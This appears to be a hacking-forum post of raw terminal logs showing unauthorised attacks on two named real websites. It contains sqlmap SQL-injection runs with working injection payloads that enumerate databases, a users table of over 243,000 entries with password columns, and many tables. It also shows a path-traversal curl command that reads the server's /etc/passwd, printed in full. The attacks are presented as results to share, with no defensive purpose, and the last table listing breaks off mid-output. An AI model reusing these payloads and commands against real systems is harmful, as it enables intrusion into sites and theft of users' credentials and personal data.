[02:58:47] [WARNING] unable to retrieve column names for table 'usarios' in database 'lc_ubase'
do you want to use common column existence check? [y/N/q] N
[02:58:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:58:47 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usuarios --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:06 /2025-09-14/

[02:59:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:59:06] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:59:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:59:07] [INFO] testing MySQL
[02:59:07] [INFO] confirming MySQL
[02:59:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
[02:59:08] [INFO] fetching columns for table 'usuarios' in database 'lc_ubase'
[02:59:09] [INFO] retrieved: 'colab','tinyint(1)'
[02:59:09] [INFO] retrieved: 'apodo','varchar(30)'
[02:59:10] [INFO] retrieved: 'correo','varchar(80)'
[02:59:10] [INFO] retrieved: 'clave','varchar(33)'
[02:59:11] [INFO] retrieved: 'status','char(1)'
[02:59:11] [INFO] retrieved: 'actkey','varchar(33)'
[02:59:11] [INFO] retrieved: 'creacion','int(11)'
[02:59:12] [INFO] retrieved: 'ultima','int(11)'
[02:59:12] [INFO] retrieved: 'ncons','mediumint(9)'
[02:59:12] [INFO] retrieved: 'amigo','varchar(20)'
[02:59:13] [INFO] retrieved: 'priv','tinyint(1)'
[02:59:13] [INFO] retrieved: 'acc','smallint(2)'
[02:59:14] [INFO] retrieved: 'newpass','varchar(64)'
[02:59:14] [INFO] retrieved: 'nof','tinyint(1)'
[02:59:14] [INFO] retrieved: 'expira','int(11)'
Database: lc_ubase
Table: usuarios
[15 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| status   | char(1)      |
| acc      | smallint(2)  |
| actkey   | varchar(33)  |
| amigo    | varchar(20)  |
| apodo    | varchar(30)  |
| clave    | varchar(33)  |
| colab    | tinyint(1)   |
| correo   | varchar(80)  |
| creacion | int(11)      |
| expira   | int(11)      |
| ncons    | mediumint(9) |
| newpass  | varchar(64)  |
| nof      | tinyint(1)   |
| priv     | tinyint(1)   |
| ultima   | int(11)      |
+----------+--------------+

[02:59:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:59:14 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usuarios --count
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:38 /2025-09-14/

[02:59:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:59:38] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:59:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:59:38] [INFO] testing MySQL
[02:59:38] [INFO] confirming MySQL
[02:59:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
Database: lc_ubase
+----------+---------+
| Table    | Entries |
+----------+---------+
| usuarios | 243328  |
+----------+---------+

[02:59:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:59:40 /2025-09-14/

This one comes with a bonus

Код:

(myenv) root@E02S29:~# curl https://lacuerda.net/reload.php?fn=../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
systuser:x:1000:1000::/usr/local/lp:/bin/true
ntp:x:38:38::/etc/ntp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:998:997:MySQL server:/var/lib/mysql:/bin/bash
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
cpanel:x:32001:1002::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32002:1003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32003:1004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32004:1005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
cpanelrrdtool:x:32005:1006::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
mailman:x:32006:1007::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell
cpanellogin:x:32007:1009::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
cpaneleximfilter:x:32008:1010::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
cpaneleximscanner:x:32009:1011::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
cpanelconnecttrack:x:32010:1012::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
cpses:x:997:996::/var/cpanel/cpses:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
clamav:x:32011:1013::/home/clamav:/sbin/nologin
joel:x:1001:1014::/home/joel:/bin/bash
lili:x:1002:1015::/home/lili:/bin/bash
mario:x:1003:1016::/home/mario:/bin/bash
napoleon:x:1004:1017::/home/napoleon:/bin/bash
antonio:x:1006:1019::/home/antonio:/bin/bash
florence:x:1007:1020::/home/florence:/bin/bash
octavio:x:1008:1021::/home/octavio:/bin/bash
systemd-bus-proxy:x:996:994:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:995:993:systemd Network Management:/:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:994:992:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cpanelcabcache:x:993:991::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell
lwadmin-Q8TLWQ:x:32012:32012:LiquidWeb_Management:/usr/local/lp/home/lwadmin:/bin/bash
cpanelsolr:x:992:990:Solr Search Server for Dovecot:/home/cpanelsolr:/bin/false
cpanelanalytics:x:991:989::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell
telegraf:x:990:986::/etc/telegraf:/bin/false
saslauth:x:989:76:Saslauthd user:/run/saslauthd:/sbin/nologin
wp-toolkit:x:988:984::/usr/local/cpanel/3rdparty/wp-toolkit/var:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
_imunify:x:987:983::/home/_imunify:/bin/false

MrDark · 14.09.2025

Код:

(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*" \
  --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61" \
  --headers="X-Requested-With: XMLHttpRequest" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch \
  --flush-session \
  --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:37:20 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:37:25] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:37:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:37:27] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[04:37:27] [WARNING] please consider usage of tamper scripts (option '--tamper')
[04:37:27] [INFO] testing if the target URL content is stable
[04:37:27] [WARNING] URI parameter '#1*' does not appear to be dynamic
[04:37:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[04:37:48] [INFO] testing for SQL injection on URI parameter '#1*'
[04:37:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:38:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[04:38:24] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable
[04:38:24] [INFO] testing 'Generic inline queries'
[04:38:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:38:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:38:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:38:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:38:25] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[04:38:25] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[04:38:26] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:38:26] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:38:26] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:38:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:38:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:38:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:38:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:38:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:38:29] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:38:29] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[04:38:29] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:38:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:38:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:38:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:38:29] [INFO] testing 'MySQL inline queries'
[04:38:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[04:38:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[04:38:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[04:38:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[04:38:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[04:38:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[04:38:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:38:41] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[04:38:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:38:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:38:47] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[04:38:53] [INFO] target URL appears to be UNION injectable with 11 columns
[04:38:53] [INFO] URI parameter '#1*' is 'Generic UNION query (random number) - 1 to 20 columns' injectable
[04:38:53] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 191 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://surahquran.com/mp3/-6467' OR 3427=3427-- iaNv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://surahquran.com/mp3/' AND (SELECT 5973 FROM (SELECT(SLEEP(5)))pNwX)-- DQfC

    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: https://surahquran.com/mp3/' UNION ALL SELECT 9755,9755,9755,9755,9755,9755,9755,9755,CONCAT(0x71626a7071,0x546c525876526472787271466c614f616e4f495072546c714772646657786e787a6f6e4c6b4b4c68,0x716a6a6b71),9755,9755-- -
---
[04:38:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[04:38:54] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] surahq_forum

[04:38:54] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times
[04:38:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:38:54 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*"   --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61"   --headers="X-Requested-With: XMLHttpRequest"   --dbms=mysql   --level=5   --risk=3   --batch      -D surahq_forum --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:39:53 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:39:53] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:39:54] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://surahquran.com/mp3/-6467' OR 3427=3427-- iaNv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://surahquran.com/mp3/' AND (SELECT 5973 FROM (SELECT(SLEEP(5)))pNwX)-- DQfC

    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: https://surahquran.com/mp3/' UNION ALL SELECT 9755,9755,9755,9755,9755,9755,9755,9755,CONCAT(0x71626a7071,0x546c525876526472787271466c614f616e4f495072546c714772646657786e787a6f6e4c6b4b4c68,0x716a6a6b71),9755,9755-- -
---
[04:39:55] [INFO] testing MySQL
[04:39:55] [INFO] confirming MySQL
[04:40:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:40:00] [INFO] fetching tables for database: 'surahq_forum'
Database: surahq_forum
[158 tables]
+---------------------------+
| AzkarFootNotes            |
| Burmese_ghazimohammadha   |
| HSN_AMMAR                 |
| HSN_Ar                    |
| HSN_CategoriesHSN_Ar      |
| HSN_En                    |
| Oromoo                    |
| ahadith                   |
| ahadith_key               |
| almulla                   |
| am_sadiq                  |
| ara_quran411              |
| ara_quranphoneticst_la    |
| asma_husna                |
| ayat                      |
| ayetler                   |
| az_mammadaliyev           |
| az_musayev                |
| baghawy                   |
| ber_mensur                |
| bg_theophanov             |
| bn_bengali                |
| bn_hoque                  |
| bs_korkut                 |
| chapters                  |
| cities                    |
| dan_vandetaal             |
| de_bubenheim              |
| de_khoury                 |
| de_zaidan                 |
| en_almuntakhab            |
| en_hilali                 |
| en_mubarakpuri            |
| en_sahih                  |
| en_transliteration        |
| en_yusufali               |
| es_garcia                 |
| es_navio                  |
| es_noor                   |
| fa_ayati                  |
| fa_khorramdel             |
| fa_mokhtasar_islamhouse   |
| fa_tagi                   |
| fil_abdullatifeduar       |
| fil_islamhouse            |
| fr_hamidullah             |
| fr_mokhtasar_islamhouse   |
| fr_noor                   |
| fr_rashid                 |
| ful_rowadtranslatio       |
| guj_rabilaalomari         |
| ha_gumi                   |
| hi_farooq                 |
| hi_footnotes              |
| hi_hindi                  |
| id_indonesian             |
| id_muntakhab              |
| ind_muhammadquraish       |
| irab_word                 |
| islamveihsan              |
| it_piccardo               |
| ja_japanese               |
| ja_jawa                   |
| kaz_khalifaha2            |
| kaz_khalifahaltaich       |
| kaz_turk                  |
| kir_shamsaldinhakim       |
| ko_korean                 |
| kor_hamidchoi             |
| ku_asan                   |
| ku_kurdish                |
| languages                 |
| ml_abdulhameed            |
| ms_basmeih                |
| nl_siregar                |
| no_berg                   |
| pan_drmuhamadhabibb       |
| pl_bielawskiego           |
| ps_abdulwali              |
| pt_elhayek                |
| pt_helmy                  |
| qaritelawat               |
| qura_shabab               |
| quran                     |
| quranWords                |
| quran_ayat                |
| quran_contactus           |
| quran_fanoos              |
| quran_general             |
| quran_id                  |
| quran_khatmat             |
| quran_recitation          |
| quran_root                |
| ru_muntahab               |
| ru_porokhova              |
| sahih_alhadith            |
| sd_amroti                 |
| si_sinhalese              |
| so_abduh                  |
| sorah                     |
| sorahqyat                 |
| sq_nahi                   |
| surah_content             |
| sureler                   |
| sv_bernstrom              |
| sw_barwani                |
| sw_barwani_footnotes      |
| ta_tamil                  |
| tafsir_e3rab_quran        |
| tafsir_e3rab_tafsircenter |
| tafsir_hidayat            |
| tafsir_ibn_abbas_en       |
| tafsir_jalalayn_en        |
| tafsir_jalalayn_id        |
| tafsir_mokhtasar_bn       |
| tafsir_mokhtasar_en       |
| tafsir_mokhtasar_id       |
| tafsir_mokhtasar_it       |
| tafsir_mokhtasar_zh       |
| tafsir_tabary             |
| tafsir_tahlili_id         |
| tafsir_wajiz_id           |
| tafsir_word               |
| tafsir_word_meaning       |
| tafsser                   |
| tags                      |
| tel_abdulraheemmoha       |
| tfs_ar_katheer            |
| tfs_ar_sa3dy              |
| tg_ayati                  |
| th_thai                   |
| topic_ayat                |
| topic_ayatold             |
| topics_name               |
| tr_anscription            |
| tr_arab                   |
| tr_diyanet                |
| tr_golpinarli             |
| tr_mokhtasar_islamhouse   |
| tr_transliteration        |
| tr_vakfi                  |
| transliteration           |
| tt_nugman                 |
| tur_alifikriyavu          |
| ug_saleh                  |
| ur_footnotes              |
| ur_jalandhry              |
| ur_maududi                |
| uz_mansour                |
| uz_sodik                  |
| uzb_muhammadsodikmu       |
| vi_rwwad                  |
| worddata                  |
| yor_shaykhaburahima       |
| zh_jian                   |
| zh_majian                 |
| zho_mazhonggang           |
| zho_muhammadmakin         |
+---------------------------+

[04:40:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/surahquran.com'

[*] ending @ 04:40:01 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://surahquran.com/mp3/*"   --cookie="PHPSESSID=sh0e3l503ub9dlbitd50k2oc61"   --headers="X-Requested-With: XMLHttpRequest"   --dbms=mysql   --level=5   --risk=3   --batch      -D surahq_forum --tables --count
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:41:54 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[04:41:54] [INFO] testing connection to the target URL
got a 302 redirect to 'https://surahquran.com/Download-Quran-mp3.html'. Do you want to follow? [Y/n] Y
[04:41:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: https://surahquran.com/mp3/-6467' OR 3427=3427-- iaNv

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://surahquran.com/mp3/' AND (SELECT 5973 FROM (SELECT(SLEEP(5)))pNwX)-- DQfC

    Type: UNION query
    Title: Generic UNION query (random number) - 11 columns
    Payload: https://surahquran.com/mp3/' UNION ALL SELECT 9755,9755,9755,9755,9755,9755,9755,9755,CONCAT(0x71626a7071,0x546c525876526472787271466c614f616e4f495072546c714772646657786e787a6f6e4c6b4b4c68,0x716a6a6b71),9755,9755-- -
---
[04:41:55] [INFO] testing MySQL
[04:41:55] [INFO] confirming MySQL
[04:41:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[04:41:58] [INFO] fetching tables for database: 'surahq_forum'
Database: surahq_forum
[158 tables]
+---------------------------+
| AzkarFootNotes            |
| Burmese_ghazimohammadha   |
| HSN_AMMAR                 |
| HSN_Ar                    |
| HSN_CategoriesHSN_Ar      |
| HSN_En                    |
| Oromoo                    |
| ahadith                   |
| ahadith_key               |
| almulla                   |
| am_sadiq                  |
| ara_quran411              |
| ara_quranphoneticst_la    |
| asma_husna                |
| ayat                      |
| ayetler                   |
| az_mammadaliyev           |
| az_musayev                |
| baghawy                   |
| ber_mensur                |
| bg_theophanov             |
| bn_bengali                |
| bn_hoque                  |
| bs_korkut                 |
| chapters                  |
| cities                    |
| dan_vandetaal             |
| de_bubenheim              |
| de_khoury                 |
| de_zaidan                 |
| en_almuntakhab            |
| en_hilali                 |
| en_mubarakpuri            |
| en_sahih                  |
| en_transliteration        |
| en_yusufali               |
| es_garcia                 |
| es_navio                  |
| es_noor                   |
| fa_ayati                  |
| fa_khorramdel             |
| fa_mokhtasar_islamhouse   |
| fa_tagi                   |
| fil_abdullatifeduar       |
| fil_islamhouse            |
| fr_hamidullah             |
| fr_mokhtasar_islamhouse   |
| fr_noor                   |
| fr_rashid                 |
| ful_rowadtranslatio       |
| guj_rabilaalomari         |
| ha_gumi                   |
| hi_farooq                 |
| hi_footnotes              |
| hi_hindi                  |
| id_indonesian             |
| id_muntakhab              |
| ind_muhammadquraish       |
| irab_word                 |
| islamveihsan              |
| it_piccardo               |
| ja_japanese               |
| ja_jawa                   |
| kaz_khalifaha2            |
| kaz_khalifahaltaich       |
| kaz_turk                  |
| kir_shamsaldinhakim       |
| ko_korean                 |
| kor_hamidchoi             |
| ku_asan                   |
| ku_kurdish                |
| languages                 |
| ml_abdulhameed            |
| ms_basmeih                |
| nl_siregar                |
| no_berg                   |
| pan_drmuhamadhabibb       |
| pl_bielawskiego           |
| ps_abdulwali              |
| pt_elhayek                |
| pt_helmy                  |
| qaritelawat               |
| qura_shabab               |
| quran                     |
| quranWords                |
| quran_ayat                |
| quran_contactus           |
| quran_fanoos              |
| quran_general             |
| quran_id                  |
| quran_khatmat             |
| quran_recitation          |
| quran_root                |
| ru_muntahab               |
| ru_porokhova              |
| sahih_alhadith            |
| sd_amroti                 |
| si_sinhalese              |
| so_abduh                  |
| sorah                     |
| sorahqyat                 |
| sq_nahi                   |
| surah_content             |
| sureler                   |
| sv_bernstrom              |
| sw_barwani                |
| sw_barwani_footnotes      |
| ta_tamil                  |
| tafsir_e3rab_quran        |
| tafsir_e3rab_tafsircenter |
| tafsir_hidayat            |
